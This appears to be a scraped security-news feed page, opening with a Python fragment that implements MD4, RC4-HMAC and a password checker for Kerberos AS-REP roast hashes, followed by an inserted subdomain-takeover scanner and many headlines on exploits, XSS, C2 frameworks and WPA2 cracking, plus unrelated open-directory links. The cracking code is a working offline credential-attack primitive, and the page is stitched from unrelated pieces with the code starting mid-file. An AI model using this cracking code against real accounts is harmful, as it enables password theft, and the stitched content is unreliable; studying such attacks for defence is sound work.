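KEY_USAGE_AS_REP = b"\x08\x00\x00\x00"  # usage 8, little-endian, per RFC 4757

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                t = (a + func(b, c, d) + x[k] + const) & _MASK
                s = shifts[i % 4]
                # rotate the register window so the next step updates the old d
                a, b, c, d = d, ((t << s) | (t >> (32 - s))) & _MASK, b, c
        state = [(v + w) & _MASK for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; this is the RC4-HMAC long-term key."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, plaintext: bytes,
                     confounder: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """KDC side: returns (checksum, ciphertext) for the AS-REP enc-part."""
    k1 = _hmac_md5(key, KEY_USAGE_AS_REP)
    data = (confounder if confounder is not None else os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, data)          # K2 == K1 for non-export keys
    k3 = _hmac_md5(k1, checksum)
    return checksum, rc4(k3, data)

def asrep_hash(principal: str, key: bytes, plaintext: bytes,
               confounder: Optional[bytes] = None) -> str:
    """Format as the $krb5asrep$23$ line Impacket emits for hashcat mode 18200."""
    checksum, ct = rc4_hmac_encrypt(key, plaintext, confounder)
    return f"$krb5asrep$23${principal}:{checksum.hex()}${ct.hex()}"

def check_candidate(asrep: str, password: str) -> bool:
    """Cracker side: derive K1 from the guess, decrypt, recompute the checksum.
    A guess is right exactly when the recomputed HMAC equals the one in the
    ticket; the session key inside the plaintext is never needed."""
    _, rest = asrep.split("$krb5asrep$23$", 1)[1].split(":", 1)
    checksum, ct = (bytes.fromhex(h) for h in rest.split("$", 1))
    k1 = _hmac_md5(nt_hash(password), KEY_USAGE_AS_REP)
    plain = rc4(_hmac_md5(k1, checksum), ct)
    return hmac.compare_digest(_hmac_md5(k1, plain), checksum)

# Constructed sample: fake principal, password and enc-part body. A real
# enc-part is the DER-encoded EncASRepPart (session key, times, flags).
SAMPLE_PASSWORD = "Summer2022!"
SAMPLE_HASH = asrep_hash("svc_backup@CORP.LOCAL", nt_hash(SAMPLE_PASSWORD),
                         b"constructed EncASRepPart body", confounder=bytes(8))

if __name__ == "__main__":
    for guess in ("Winter2022!", "Password1", SAMPLE_PASSWORD):
        print(f"{guess:>12}: {'MATCH' if check_candidate(SAMPLE_HASH, guess) else 'no'}")
```

    The cost per guess is one MD4, three HMAC-MD5s and one RC4 pass, which is why etype 23 roasts crack so quickly compared with the AES etypes, whose PBKDF2-based string-to-key dominates the work.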
    Are APT groups using Posh C2? I could have sworn I read it multiple times, but googling I cannot find anything. It's possible I'm confusing it with PoshRat.
    submitted by /u/HamburgersNHeroin [link] [comments]
    Rewards plus: Fake mobile banking rewards apps lure users to install info-stealing RAT on Android devices
    submitted by /u/SCI_Rusher [link] [comments]
    Attack Chain/Exploitation Path Diagram Generation Tools?
    We all know that there is no better satisfaction than utterly owning a myriad of hosts after combining several misconfigurations to achieve the goal (and more) of an assessment. It's just as good when getting that into the report for the client and running them through what happened. The problem, or the problem we're having, is being able to pictorially demonstrate the paths we took throughout the chain of attack. We've taken a look at AttackForge, but it's pretty certain that it'll be brushed away due to costs (even if it would be great to manage tests). Right now the team is screenshotting each step with some contextual explanation, which is fine, but ideally I would like us to be able to graphically represent what exactly happened from initial exploitation to reaching the goal of the assessment; rather than have only the screenshots, we could have the attack path graphics along with ATT&CK as part of the Summary. Hope that makes sense, and curious if the community knows of any alternative tools? submitted by /u/SpaceLionBlues [link] [comments]
    Ransomware simulation tools
    Hello everyone, can you recommend me a free tool to simulate ransomware attacks? submitted by /u/Equivalent_Year154 [link] [comments]
  • Open

    Harry Potter 1-7 audio books read by Jim Dale (+ parent directory: LOTR 1, A Wrinkle in Time, A Series of Unfortunate Events, Narnia, Wizard of Oz, etc.)
    submitted by /u/NonGameCatharsis [link] [comments]
  • Open

    Arbitrum Saved From a Bug That Could Have Led to the Loss of $540M in Ethereum
    A white hat hacker discovered and disclosed a bug on Arbitrum’s latest upgrade that could have resulted in the loss of $530 million ETH. Continue reading on Medium »
    How I hacked an exam portal and got access to 10K+ users data including webcams
    Hello guys, I am Faique a security researcher and a bug bounty hunter and I welcome you to my write-up on a story of a hack that I did… Continue reading on InfoSec Write-ups »
    f2q1 — error code — over-the-range microwave
    If you’re encountering an f2q1 — error code — over-the-range microwave oven, don’t fret — we’ve got you covered on what this means and how… Continue reading on Medium »
    Easy way to Install waybackurls on Kali Linux.
    Fetch known URLs from the Wayback Machine for domains. Continue reading on Medium »
    What is a Security Operations Center (SOC)
    A security operations centre (SOC) — also known as an information security operations centre, or ISOC — is an in-house or outsourced team… Continue reading on Medium »
    Mass Assignment Leading to Pre Account Takeover
    API also called as Application Programmable Interface is used everywhere from modern automotive (smart), mobile, web and IOT devices etc… Continue reading on Medium »
  • Open

    Cellebrite Logical Image
    Can you create a logical image of a subset (like Encase) in PA? submitted by /u/hw60068n [link] [comments]
    how do I download Autopsy on Mac OS?
    I have a class in digital forensics and my professor required us to download Autopsy for class. I have a problem downloading it on my Mac OS; my professor made a big deal about not asking him how to download it because he doesn't know. I used this article I found to download it through the terminal and used it for one assignment, then it crashed and I don't know how to relaunch it again via the terminal. This is the link I followed: https://www.arcpointforensics.com/news/installing-autopsy-on-macos-big-sur submitted by /u/gabbymichelle [link] [comments]
  • Open

    SecWiki News 2022-09-21 Review
    Attack surface analysis of Cloud Native PostgreSQL by ourren; 2022 Yangcheng Cup competition web challenge write-ups by ourren; A journey through endpoint intrusion detection and defense evasion by 风迷; A summary of my three years on red teams by ourren. For more of the latest articles, visit SecWiki
  • Open

    CSRF vulnerability in NPM package csurf
    Article URL: https://snyk.io/blog/explaining-the-csurf-vulnerability-csrf-attacks-on-all-versions/ Comments URL: https://news.ycombinator.com/item?id=32926881 Points: 1 # Comments: 0
  • Open

    Subdomain Takeover
    🔍 Introduction Subdomain Takeover is an attack in which, once the server mapped to a subdomain has been removed or deleted, an attacker claims the IP, configuration or resource behind it and takes over the subdomain. It commonly occurs with services such as S3, GitHub Pages and Heroku. For example: takeme.target.com => target1144.github.io. As above, the takeme subdomain points to target1144's GitHub Pages site; the target1144 account has been deleted; the domain currently returns 404 because the GitHub Pages site has no owner. If an attacker now creates a new account named target1144 and sets up a GitHub Pages site, they can serve content on the takeme.target.com domain. 🗡 Offensive techniques. Detect: you have to infer which environment a subdomain runs on from the data exposed in the response when you access the service. Usually, when no server is connected or the account has been deleted, each service shows a specific message, and this makes identification easy. For example, when no repository is mapped on GitHub Pages, the following message appears: There isn't a GitHub Pages site here. Details for each service can be found in Can I take over XYZ, and combining subdomain enumeration tools such as Amass, Subfinder and Findomain with takeover-checking tools such as SubOver and Subjack makes identification easy. Find Subdomain Takeover with Amass + SubJack. Exploitation: once you have found a vulnerable domain, you can prove it by taking over the domain through the connected service. For example, if the domain is mapped to an S3 bucket name but no S3 bucket is connected, then that...
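    The detection step described above, CNAME to a known provider plus an "unclaimed" fingerprint in the response, is what Subjack-style checkers automate. The following is an added example written for this page, not code from the article or from any of the tools it names. The GitHub Pages string is the one the article quotes; the S3 and Heroku patterns are assumptions in the style of the Can I take over XYZ lists and should be re-verified before relying on them. DNS and HTTP are stood in for by constructed dictionaries so the block runs offline; the resolver and fetcher are plain callables so a live scan only needs real implementations plugged in.

```python
"""Subdomain-takeover triage: classify a host by its CNAME target and the
response fingerprint, the way an Amass + Subjack pipeline does."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Service fingerprints keyed by CNAME suffix. GitHub's text is quoted in the
# article; the S3 and Heroku patterns are assumptions and need re-verifying.
FINGERPRINTS = {
    "github.io": re.compile(r"There isn't a GitHub Pages site here"),
    "amazonaws.com": re.compile(r"NoSuchBucket"),
    "herokuapp.com": re.compile(r"No such app"),
}

Resolver = Callable[[str], Optional[str]]  # host -> CNAME target, or None
Fetcher = Callable[[str], Optional[str]]   # host -> HTTP body, or None if unreachable

@dataclass
class Finding:
    host: str
    cname: str
    service: str
    reason: str

def check_host(host: str, resolve: Resolver, fetch: Fetcher) -> Optional[Finding]:
    """Return a Finding when `host` CNAMEs to a fingerprinted provider and the
    response looks unclaimed; None when healthy or outside this attack class."""
    cname = resolve(host)
    if cname is None:
        return None                      # no CNAME: not this class of takeover
    cname = cname.rstrip(".").lower()
    for suffix, pattern in FINGERPRINTS.items():
        if cname == suffix or cname.endswith("." + suffix):
            body = fetch(host)
            if body is None:
                # CNAME target is in DNS but nothing answers: dangling record,
                # worth manual verification but not yet proven claimable.
                return Finding(host, cname, suffix, "cname target unreachable (dangling?)")
            if pattern.search(body):
                return Finding(host, cname, suffix, "unclaimed-resource fingerprint matched")
            return None                  # provider served real content
    return None                          # CNAME to a provider we have no fingerprint for

def scan(hosts: List[str], resolve: Resolver, fetch: Fetcher) -> List[Finding]:
    return [f for f in (check_host(h, resolve, fetch) for h in hosts) if f]

# Constructed fixtures standing in for DNS and HTTP. For a live run, replace
# with dnspython's dns.resolver (CNAME lookup) and urllib/requests (GET body).
SAMPLE_CNAMES: Dict[str, Optional[str]] = {
    "takeme.target.com": "target1144.github.io.",
    "docs.target.com": "target-docs.github.io.",
    "assets.target.com": "target-assets.s3.amazonaws.com.",
    "app.target.com": None,
}
SAMPLE_BODIES: Dict[str, Optional[str]] = {
    "takeme.target.com": "<html>There isn't a GitHub Pages site here.</html>",
    "docs.target.com": "<html>Welcome to the product docs</html>",
    "assets.target.com": "<Error><Code>NoSuchBucket</Code></Error>",
}

def sample_scan() -> List[Finding]:
    return scan(list(SAMPLE_CNAMES), SAMPLE_CNAMES.get, SAMPLE_BODIES.get)

if __name__ == "__main__":
    for f in sample_scan():
        print(f"{f.host} -> {f.cname} [{f.service}]: {f.reason}")
```

    A fingerprint match is a lead, not proof: wildcard DNS, CDN error pages and providers that refuse to re-issue a deleted name all produce false positives, which is why the article's exploitation step (actually registering the resource and serving content) is the only conclusive check.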
  • Open

    SharpImpersonation: a user-impersonation tool based on tokens and shellcode injection
    SharpImpersonation is a powerful user-impersonation tool that implements its functionality through the token mechanism and shellcode injection.
    FreeBuf Morning Report | Two Chinese telecom companies placed on US threat list; game publisher 2K's website hacked
    Pacific Networks Corp and its subsidiary ComNet (USA) LLC, together with China Unicom (Americas) Operations Limited, have been added to the list of communications equipment and services deemed a threat to national security.
    Xinyang Normal University exposed for a "CHSI (学信网) information leak"; university: police notified, student cadres involved removed from their posts
    On September 19, Xinyang Normal University in Henan was reported to have suffered a leak of CHSI (学信网) data; the university filed a police report immediately.
    Top 10 nation-state APT groups worldwide ranking released
    Based on the information publicly available today, FreeBuf selected a top-ten ranking of nation-state APT groups along two dimensions: destructiveness and activity level.
    "Highest standard" for children's privacy! California passes Internet privacy legislation
    The new law will impose some of the strictest privacy requirements in the US on children, particularly with respect to social media.
    Hackers steal $162 million from crypto market maker Wintermute
    Wintermute CEO Evgeny Gaevoy announced that its DeFi-related business had been hacked, losing about $162.2 million.
  • Open

    Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime
    Domain shadowing is a special case of DNS hijacking where attackers stealthily create malicious subdomains under compromised domain names. The post Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime appeared first on Unit 42.
  • Open

    Write-up: File path traversal, validation of file extension with null byte bypass @ PortSwigger…
    This write-up for the lab File path traversal, validation of file extension with null byte bypass is part of my walkthrough series for… Continue reading on InfoSec Write-ups »
    Vulnerable Flask App
    No content preview
  • Open

    A brief discussion of passive IAST products and their technical implementation
    Author: iiusky@墨云科技VLab Team. Original link: https://mp.weixin.qq.com/s/6olAInQLPDaDAO3Up1rQvQ. Having gained some relevant experience from taking part in RASP research and development, I have noticed IAST gaining clear momentum over the past two years, but there are currently few articles at home or abroad on the details of how IAST is implemented, and the only open-source IAST I have seen is DongTai (洞态), so I would like to explore and share the principles and technical implementation of IAST from my own perspective. This article only...
  • Open

    Am I going insane? Why isn't a return address saved on the stack here?
    https://preview.redd.it/pbjdes26i4p91.png?width=1762&format=png&auto=webp&s=c178b19fd003cde06f77028dd9c2f8a81f5b36ec submitted by /u/FinanceAggravating12 [link] [comments]
  • Open

    Fuzzing Hardware Like Software
    Article URL: https://arxiv.org/abs/2102.02308 Comments URL: https://news.ycombinator.com/item?id=32919571 Points: 1 # Comments: 0
  • Open

    One takeover to rule them all
    Because of Covid, the first quarantine in France occurred in March 2020. During that time I wrote a Python script to detect Subdomain Takeover. As I have been successful several times with the tool, one hit was especially beautiful. The story of how I have been able to take control of 450+ subdomains of the national French electricity company EDF. I'm not going to explain what subdomain takeover is, so take a look at the following articles if you want to know more: OWASP test guide

  • Open

    Finding the Sliver Lining (Sliver Walkthrough)
    Shameless self-promotion here, but I did a walkthrough of the Sliver adversary emulation framework and showed some ways to detect the beacons. I saw some other people post it to Reddit, so I thought I would just submit it myself. https://youtu.be/izMMmOaLn9g submitted by /u/Infosecsamurai [link] [comments]
    Leverage Autorun programs - Win PrivEsc
    submitted by /u/Clement_Tino [link] [comments]
    Crack WPA2-PSK from Probing Clients
    submitted by /u/tbhaxor [link] [comments]
  • Open

    REX (XRX) Bug Bounty Program
    The rex.io project invites everyone to take part in the REX Bug Bounty program, to find bugs in the REX Smart Contracts. Continue reading on Medium »
    SynFutures Goes Mobile on Testnet, Launches Bug Bounty Campaign
    The SynFutures team is excited to announce the mobile version of our decentralized derivatives trading platform is now available on… Continue reading on SynFutures »
    Web Reconnaissance For Bug Bounty
    I know you’ll love this blog guys and this time to talk about information gathering for our targets in bug bounty, I have tools, tips so… Continue reading on Medium »
    Project Degis Testnet Task and Tutorial
    During the testnet, participants will act as underwriters or buyers to experience the whole workflow. Testnet will also simulate all… Continue reading on Medium »
    Privilege Escalation Leads to making authenticated actions (payment processing, creating invoices..
    Introduction Continue reading on Medium »
    Problem installing Nuclei
    I recently had to reinstall Nuclei from scratch on a testing machine. Continue reading on Bug Bounty »
    Unsubscribe any user’s e-mail notifications via IDOR
    Description: I would like to share how I was able to unsubscribe any user from the Target website’s email notification service. Insecure… Continue reading on Medium »
    Bypassing CSRF Protection (I)
    Hi, My name is Hashar Mujahid and in this blog, we will talk about some techniques to bypass the csrf protection. Continue reading on InfoSec Write-ups »
  • Open

    ResponderCon Followup
    I had the opportunity to speak at the recent ResponderCon, put on by Brian Carrier of BasisTech. I'll start out by saying that I really enjoyed attending an in-person event after 2 1/2 yrs of virtual events, and that Brian's idea to do something a bit different (different from OSDFCon) worked out really well. I know that there've been other ransomware-specific events, but I've not been able to attend them. As soon as the agenda kicked off, it seemed as though the first four presentations had been coordinated...but they hadn't. It simply worked out that way. Brian referenced what he thought my content would be throughout his presentation, I referred back to Brian's content, Allan referred to content from the earlier presentations, and Dennis's presentation fit right in as if it were a seaml…
    Deconstructing Florian's Bicycle
    Not long ago, Florian Roth shared some fascinating thoughts via his post, The Bicycle of the Forensic Analyst, in which he discusses increases in efficiency in the forensic review process. I say "review" here, because "analysis" is a term that is often used incorrectly, but that's for another time. Specifically, Florian's post discusses efficiency in the forensic review process during incident response. After reading Florian's article, I had some thoughts that I wanted to share that would extend what he's referring to, in part because I've seen, and continue to see, the need for something just like what is discussed. I've shared my own thoughts on this topic previously. My initial foray into digital forensics was not terribly different from Florian's, as he describes in his article. For me,…
  • Open

    TryHackMe: OhSINT Walkthrough
    What information can you possibly get with just one photo? Link: OhSINT Continue reading on Medium »
    OSINT AND TOP 15 OPEN-SOURCE INTELLIGENCE TOOLS
    OSINT is an acronym for open-source intelligence and forms one of the key concepts in building a robust cybersecurity system. OSINT is the… Continue reading on InfoSec Write-ups »
  • Open

    Oracle Cloud vulnerability allows unauthorized access to customer cloud storage volumes
    submitted by /u/sagitz_ [link] [comments]
    Cool Attack -- Bypassing NAT and Firewalls to Shut Down PDUs
    submitted by /u/derp6996 [link] [comments]
    Open Source Tool to Collect Volatile Data for Incident Response
    submitted by /u/0x636f6f6c [link] [comments]
  • Open

    IDOR on Tagged People
    TikTok disclosed a bug submitted by apapedulimu: https://hackerone.com/reports/1555376 - Bounty: $3000
    Use-after-free in setsockopt IPV6_2292PKTOPTIONS (CVE-2020-7457)
    PlayStation disclosed a bug submitted by theflow0: https://hackerone.com/reports/1441103 - Bounty: $10000
    CORS Misconfiguration on vanillaforums.com
    Vanilla disclosed a bug submitted by admin0x00: https://hackerone.com/reports/1527555 - Bounty: $150
  • Open

    Oracle Cloud vulnerability allowed users to access disks of other customers
    Article URL: https://twitter.com/shirtamari/status/1572223325719646211 Comments URL: https://news.ycombinator.com/item?id=32917973 Points: 2 # Comments: 1
    OCI vulnerability allows unauthorized access to customer cloud storage volumes
    Article URL: https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access Comments URL: https://news.ycombinator.com/item?id=32913221 Points: 20 # Comments: 2
  • Open

    A Guide to Virtual Patching for Website Vulnerabilities
    All software has bugs — but some bugs can lead to serious security vulnerabilities that can impact your website and traffic. Vulnerabilities can be especially dangerous when your software is running over the web, since anyone can reach out and try to attack it. That’s why keeping your website up-to-date with the latest patches and security updates is so important. The reality is there is no shortage of websites running outdated WordPress, Joomla, or Magento software. Continue reading A Guide to Virtual Patching for Website Vulnerabilities at Sucuri Blog.
  • Open

    How I Hacked my College’s student portal
    No content preview
    Bypassing CSRF Protection (I)
    No content preview
    OSINT AND TOP 15 OPEN-SOURCE INTELLIGENCE TOOLS
    No content preview
    30 Search Engines for Cybersecurity Researchers (Part 3 of 3)
    No content preview
    Abusing Broken Link In Fitbit (Google Acquisition)To Collect BugBounty Reports On Behalf Of Google !
    No content preview
    Cross-site request forgery (CSRF) Explained and Exploited I
    No content preview
    Phishing and its effect on healthcare sector
    No content preview
    Domain-based Message Authentication Reporting and Conformance (DMARC) and its importance for…
    No content preview
    Key Web 3.0 Security Issues That Need to be Settled
    No content preview
    How to get Cloud Security Experience without a job
    Get that coveted experience before you land a cloud security job Continue reading on InfoSec Write-ups »
  • Open

    19 Dune audiobooks (unabridged)
    submitted by /u/NonGameCatharsis [link] [comments]
  • Open

    SecWiki News 2022-09-20 Review
    No news updates today. For more of the latest articles, visit SecWiki
  • Open

    varc - Open Source tool for Volatile Artifact Collection
    submitted by /u/0x636f6f6c [link] [comments]
    Gaming Console Forensic Tools and Processes
    How do you handle gaming consoles such as the Playstation, X-Box, Nintendo Switch, or others during forensic investigations? Are there any tools that you can recommend? How do you acquire the data on those devices and how do you process it? I'm particularly interested in any best practices as well as getting the communication artifacts and usage data. Can you recommend any resources such as books, blog posts, research articles, or courses on this topic? submitted by /u/F-2016 [link] [comments]
  • Open

    Red-team attack and defense diary: using a router to create a PPTP tunnel into the internal network
    In attack-defense exercises, control of a network device scores higher than control of a website precisely because a compromised network device makes it easy to get into the internal network. As in this case, where a router was used to create a PPTP virtual private network tunnel into the intranet: gaining control of a network device is half the way to getting inside.
    FreeBuf Morning Report | Uber mired in data breach; Indonesia passes data privacy law
    Uber disclosed more details about last week's security incident, attributing the attack to a threat actor it believes is affiliated with the notorious LAPSUS$ hacking group.
    Rockstar Games hacked; 90 development videos of Grand Theft Auto 6 leaked
    Development footage of the popular game Grand Theft Auto 6 was stolen by hackers at scale, and the leak spread rapidly across gaming circles.
    Infernal Affairs! "Sandworm" group impersonates Ukrainian telecom companies to deliver malware
    The Sandworm hacking group disguised itself as telecom providers to attack Ukrainian entities with malware.
    After Beijing's Health Kit, Macau's health code is also attacked by overseas forces
    Valuing the cultivation of cybersecurity talent and increasing investment in research on frontier network technology: building a strong cybersecurity nation must not remain a mere slogan.
    These views carry weight! Season four of FreeBuf's Cybersecurity Think Tank Talks wraps up
    This article reviews the highlights of the season, with posters of expert quotes.
    Call for papers | CIS 2022 Cybersecurity Innovation Conference: multidimensional spacetime, setting sail this autumn
    On November 16, the long-awaited eighth Cybersecurity Innovation Conference will be held in Shanghai.
    Everything you need to know about Multi-Level Protection Scheme 2.0 (等保2.0) in one article
    Cybersecurity Multi-Level Protection refers to the graded security protection of important state information, the proprietary information of legal persons, other organizations and citizens, and the information systems that store, transmit and process that information.
    Attackers are impersonating US government agencies to phish contractors' Office accounts
    An ongoing phishing campaign against US government contractors is expanding, with attackers crafting phishing documents around lures that are harder to tell apart from the real thing.
    Attack technique assessment | A new phishing method seen frequently of late: forged pop-up login windows
    This article analyzes and explores the BITB (browser-in-the-browser) technique seen in the incident.
    Hands-on incident response to a cryptomining infection at a university
    An emergency response to a cryptomining infection, set off by a night of overtime
  • Open

    I Wanna Go Fast, Really Fast, like (Kerberos) FAST
    1 Introduction. At TrustedSec, we weigh an information security program's ability to defend against a single specified attack by measuring detection, deflection, and deterrence. Now, while the majority of my blog posts have concentrated on detection, this post is more 'deterrence' focused. I first heard about Kerberos FAST from Steve Syfuhs (@SteveSyfuhs) of Microsoft... The post I Wanna Go Fast, Really Fast, like (Kerberos) FAST appeared first on TrustedSec.
  • Open

    Parameters in Lambda Functions that lead to XSS and Injection
    ACM.56 How I might abuse your Lambda function on a pentest if you don’t properly secure your inputs Continue reading on Cloud Security »
  • Open

    404 StarLink Project | Three new open-source tools from security teams added! Check them out!
    About the StarLink Project: the "404 StarLink Project" (404星链计划) is an open-source project collection initiative proposed by Knownsec 404 Team in August 2020. The original intent was to release some of the 404 Team's internal tools as open source so they could deliver greater value; that was "404 StarLink Project 1.0", which included well-known tools such as Pocsuite3 and ksubdomain, and we quickly received a lot of good feedback. In November 2020 we turned our attention to the whole security community, with StarLink members at the core, selecting high-quality, meaningful, interesting and persistently...
    CVE-2021-34866 Linux kernel privilege escalation vulnerability analysis
    Author: b1cc@墨云科技VLab Team. Original link: https://mp.weixin.qq.com/s/w0HYPpdMxhcPvKvtSJf_CQ. On October 12, 2021, the Japanese security vendor Flatt Security disclosed the Linux kernel privilege escalation vulnerability CVE-2021-34866. On November 5, @HexRabbit published an exploit for the vulnerability on GitHub together with a write-up analyzing it, technically brilliant and concisely written...
  • Open

    Gauing for instant bounties.[Conclusion]
    So in the previous part, I explained how to Gau, to score instant bounties. Continue reading on Medium »
    THE BUG OFTEN IGNORED: BLIND XSS
    INTRODUCTION Continue reading on Medium »
    Discovery of an IDOR flaw and extraction of telephone data
    I have a loyalty customer account with a large clothing retailer... I want to blur the retailer's name in the rest of this... Continue reading on Medium »
    How I found the Stored XSS and Clickjacking.
    Hello everyone! I’m Nitish, this is my first write-up. Hope you all are doing great. Continue reading on Medium »
    Cookie Parameter to XSS [Bounty Writeups -2]
    XSS is Dead!!! NaN…You don't get it. Continue reading on Medium »
    All about: Path/Directory Traversal
    In this section, we’ll explain what directory traversal is, describe how to carry out path traversal attacks and circumvent common… Continue reading on Medium »
  • Open

    GCFE Lab Questions
    Hello! I'm going to be taking the GCFE exam in a couple of weeks and started freaking out because I read there will be lab questions where you have to spin up a VM; is that true? I've heard SANS/GIAC want to add hands-on questions to their exams. Can anyone who recently took this exam confirm? Are the lab questions part of the total 115 questions or are they an additional section? TYIA submitted by /u/Comprehensive-Camp56 [link] [comments]
    Career in digital forensics
    Hey all - just querying what a career is like in digital forensics? Is it worthwhile and rewarding? Good work/life balance? Career Progression and longevity? I have an opportunity for an entry level DF job for a law enforcement organisation. Relatively good pay, although I’m unsure about the rest at this stage. Any tips recommended. Thank you. submitted by /u/OkGrape5530 [link] [comments]
    Need advice on career path
    I am a college student currently thinking about a career in digital forensics. I like taking things apart and analyzing them. I am the guy the family calls to help, and I sit there for hours looking things up till I find the problem. But the main thing that interests me is impactful work that helps people. I want to go down the LE route but have no idea how to get qualified. Currently majoring in computer forensics for my associate's, then after that transferring into a 4-year and majoring in something computer science related. But until then, should I be applying for internships? Am I taking the right major, and what requirements or certifications should I be pursuing? I need some guidance, so any information is much appreciated. submitted by /u/Fireman_XXR [link] [comments]
    Database Forensic tools
    Hello, I am currently taking a Computer Forensics class at my school and I have been tasked with researching Database Forensics and its associated tools. I am having some issues determining what tools there are and would like to request some help. If I could just be pointed in the right direction that would be great. Any links provided would be a blessing. Thank you to anyone that can help. submitted by /u/Driagis [link] [comments]
  • Open

    STDiO2022 : 1 — Dark Web Investigation (OSINT)
    SPOILER ALERT : Hello I’m scriptpit01 !! This is a writeup for the STDiO2022 “1 — Dark Web Investigation” which will end up in showing the… Continue reading on Medium »
  • Open

    Announcing the Launch of the Chrome Root Program
    In 2020, we announced we were in the early phases of establishing the Chrome Root Program and launching the Chrome Root Store.  The Chrome Root Program ultimately determines which website certificates are trusted by default in Chrome, and enables more consistent and reliable website certificate validation across platforms.  This post shares an update on our progress and how these changes help us better protect Chrome’s users. What’s a root store or root program, anyway? Chrome uses digital certificates (often referred to as “certificates,” “HTTPS certificates,” or “server authentication certificates”) to ensure the connections it makes on behalf of its users are secure and private. Certificates are responsible for binding a domain name to a public key, which Chrome uses to encrypt dat…
  • Open

    I'm Building a Self-Destructing USB Drive Part 2
    submitted by /u/Machinehum [link] [comments]
    Vulnerabilities Identified in EZVIZ Smart Cams
    submitted by /u/Turbulent-Ant-6813 [link] [comments]
    When Athletic Abilities Just Aren't Enough - Scoreboard Hacking Part 1
    submitted by /u/mdulin2 [link] [comments]
  • Open

    SecWiki News 2022-09-19 Review
    JavaScript auditing by 蓝色淡风; Research on account-hijacking vulnerabilities arising in OAuth flows by 蓝色淡风; SecWiki Weekly (issue 446) by ourren; Building an enterprise data governance system from 0 to 1 by ourren; BlackHat USA 2022 talks, slow delivery by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Comics (Not sure if NSFW)
    https://booksdl.org/comics0/ https://booksdl.org/comics1/ submitted by /u/Appropriate-You-6065 [link] [comments]
    Gun manuals and pictures
    General gun pictures https://www.sturmgewehr.com/bhinton/ https://www.sturmgewehr.com/dalbert/ http://tirito.com.ar/Venta/ Gun manuals and catalogs http://www.louiscandell.com/pdf/ (Unrelated but on same site) Audio files http://www.louiscandell.com/audio/ Lyrics http://www.louiscandell.com/lyrics/ UZI open directory (nsfw uzigirls folder) http://www.uzitalk.com/reference/ submitted by /u/c-rn [link] [comments]
    Survival / Prepper books
    https://shtfinfo.com/shtffiles/alternative_energy/ https://shtfinfo.com/shtffiles/animals/ https://shtfinfo.com/shtffiles/books_and_reading/ https://shtfinfo.com/shtffiles/bov/ https://shtfinfo.com/shtffiles/canning/ https://shtfinfo.com/shtffiles/clothing/ https://shtfinfo.com/shtffiles/comm/ https://shtfinfo.com/shtffiles/construction/ https://shtfinfo.com/shtffiles/defense/ https://shtfinfo.com/shtffiles/food/ https://shtfinfo.com/shtffiles/gardening/ https://shtfinfo.com/shtffiles/good_info/ https://shtfinfo.com/shtffiles/gun_manuals/ https://shtfinfo.com/shtffiles/health_hygiene/ https://shtfinfo.com/shtffiles/historic_documents/ https://shtfinfo.com/shtffiles/how_to/ https://shtfinfo.com/shtffiles/hunting_trapping/ https://shtfinfo.com/shtffiles/list_bob_cache/ https://shtfinfo.com/shtffiles/manuals/ https://shtfinfo.com/shtffiles/maps_navigation/ https://shtfinfo.com/shtffiles/medical_remedies/ https://shtfinfo.com/shtffiles/nuclear_chemical/ https://shtfinfo.com/shtffiles/prepare/ https://shtfinfo.com/shtffiles/recipes/ https://shtfinfo.com/shtffiles/scouting// https://shtfinfo.com/shtffiles/shelter/ https://shtfinfo.com/shtffiles/social/ https://shtfinfo.com/shtffiles/survival/ https://shtfinfo.com/shtffiles/tables_conversions/ https://shtfinfo.com/shtffiles/tactical/ https://shtfinfo.com/shtffiles/targets/ https://shtfinfo.com/shtffiles/training/ https://shtfinfo.com/shtffiles/water/ submitted by /u/c-rn [link] [comments]
    French remote-control vehicle magazines
    http://www.rc-paper.com/scansHD/ submitted by /u/c-rn [link] [comments]
    Shortwave radio manuals
    http://www.manuals.cornpone.net/ submitted by /u/c-rn [link] [comments]
  • Open

    JIT-Picking: Differential Fuzzing of JavaScript Engines
    Article URL: https://publications.cispa.saarland/3773/ Comments URL: https://news.ycombinator.com/item?id=32899668 Points: 2 # Comments: 0
  • Open

    Hacking Smart Contracts, Android Vulnerability, RCE, Prototype Poisoning, Anti-Human Server…
    No content preview
    How I abused the file upload function to get a high severity vulnerability in Bug Bounty
    No content preview
    The terrifying world of Cross-Site Scripting (XSS) (Part 2) — StackZero
    No content preview
    Living Off The Land: Suspicious System32
